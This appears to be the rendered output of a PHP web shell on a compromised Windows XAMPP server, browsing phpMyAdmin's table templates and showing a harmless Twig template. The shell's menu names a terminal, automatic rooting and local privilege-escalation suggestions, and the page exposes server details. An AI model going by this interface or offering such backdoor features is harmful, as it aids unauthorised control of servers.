Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
phpMyAdmin /
templates /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
browse_foreigners
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
chart
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
delete
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
export
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
find_replace
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
gis_visualization
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
import
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
insert
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
maintenance
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
operations
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
partition
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
privileges
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
relation
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
search
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
structure
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
tracking
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
zoom_search
[ DIR ]
drwxrwxrwx
2024-07-26 17:41
index_form.twig
10.26
KB
-rw-rw-rw-
2023-02-07 22:26
index_rename_form.twig
1.01
KB
-rw-rw-rw-
2023-02-07 22:26
page_with_secondary_tabs.twig
986
B
-rw-rw-rw-
2023-02-07 22:26
start_and_number_of_rows_fieldset.twig
946
B
-rw-rw-rw-
2023-02-07 22:26
Save
Rename
{% if relation_parameters.relationFeature is not null or is_foreign_key_supported %} <ul class="nav nav-pills m-2 d-print-none"> <li class="nav-item"> <a href="{{ url('/table/structure', {'db': db, 'table': table}) }}" id="table_structure_id" class="nav-link{{ route == '/table/structure' ? ' active' }}"> {{ get_icon('b_props', 'Table structure'|trans, true) }} </a> </li> <li class="nav-item"> <a href="{{ url('/table/relation', {'db': db, 'table': table}) }}" id="table_relation_id" class="nav-link{{ route == '/table/relation' ? ' active' }}"> {{ get_icon('b_relations', 'Relation view'|trans, true) }} </a> </li> </ul> {% endif %} {% for flash_key, flash_messages in flash() %} {% for flash_message in flash_messages %} <div class="alert alert-{{ flash_key }}" role="alert"> {{ flash_message }} </div> {% endfor %} {% endfor %} <div id="structure_content"> {% block content %}{% endblock %} </div>